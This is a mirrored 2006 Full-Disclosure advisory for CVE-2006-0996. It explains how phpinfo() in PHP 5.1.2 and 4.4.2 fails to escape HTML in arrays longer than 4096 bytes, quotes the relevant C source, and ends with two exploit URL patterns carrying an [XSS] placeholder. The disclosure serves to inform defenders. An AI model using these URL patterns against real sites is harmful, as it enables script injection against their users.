Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12135
HistoryApr 10, 2006 - 12:00 a.m.

[Full-disclosure] phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2

2006-04-1000:00:00
vulners.com
7473

Source: http://securityreason.com/achievement_securityalert/34

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:

  • -Written: 26.2.2006

  • -Public: 8.4.2006
    from SecurityReason.Com
    CVE-2006-0996

  • — 0.Description —
    PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
    from C, Java and Perl with a couple of unique PHP-specific features thrown
    in. The goal of the language is to allow web developers to write dynamically
    generated pages quickly.

A nice introduction to PHP by Stig S?ther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.

  • — 1. Cross Site Scripting —
    In phpinfo() you can see all Varibles like:

file: standard/info.c

  • -630-636—
    php_print_gpcse_array("_REQUEST", sizeof("_REQUEST")-1 TSRMLS_CC);
    php_print_gpcse_array("_GET", sizeof("_GET")-1 TSRMLS_CC);
    php_print_gpcse_array("_POST", sizeof("_POST")-1 TSRMLS_CC);
    php_print_gpcse_array("_FILES", sizeof("_FILES")-1 TSRMLS_CC);
    php_print_gpcse_array("_COOKIE", sizeof("_COOKIE")-1 TSRMLS_CC);
    php_print_gpcse_array("_SERVER", sizeof("_SERVER")-1 TSRMLS_CC);
    php_print_gpcse_array("_ENV", sizeof("_ENV")-1 TSRMLS_CC);
  • -630-636—

Function php_print_gpcse_array() for any arrays check 4096b of varible.

file: standard/info.c

  • -135-154—
    if (Z_TYPE_PP(tmp) == IS_ARRAY) {
    zval *tmp3;
    MAKE_STD_ZVAL(tmp3);
    if (!sapi_module.phpinfo_as_text) {
    PUTS("<pre>");
    }
    php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC);
    zend_print_zval_r(*tmp, 0);
    php_ob_get_buffer(tmp3 TSRMLS_CC);
    php_end_ob_buffer(0, 0 TSRMLS_CC);

                              elem_esc = php_info_html_esc&#40;Z_STRVAL_P&#40;tmp3&#41; TSRMLS_CC&#41;;
                              PUTS&#40;elem_esc&#41;;
                              efree&#40;elem_esc&#41;;
                              zval_ptr_dtor&#40;&amp;tmp3&#41;;
    
                              if &#40;!sapi_module.phpinfo_as_text&#41; {
                                      PUTS&#40;&quot;&lt;/pre&gt;&quot;&#41;;
                              }
                      } else if &#40;Z_TYPE_PP&#40;tmp&#41; != IS_STRING&#41; {
    
  • -135-154—

So if we create array longer like 4096, html tags don't be remove.

Exploit:
If in php script is function phpinfo() try create some varibles (array) like

phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][][][]=[XSS]

or

phpinfo.php?cx[]=ccccc…~4096chars…ccc[XSS]

For: sp3x
and
p_e_a, pi3, eax ;]

iD8DBQFEOAIl3Ke13X/fTO4RAo4LAJ0fBxJWN64vWrDYJEuhGkqc/OC42QCbBxip
f35+6LHjuBoqP5D2JV84ufs=
=iz3m
-----END PGP SIGNATURE-----


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/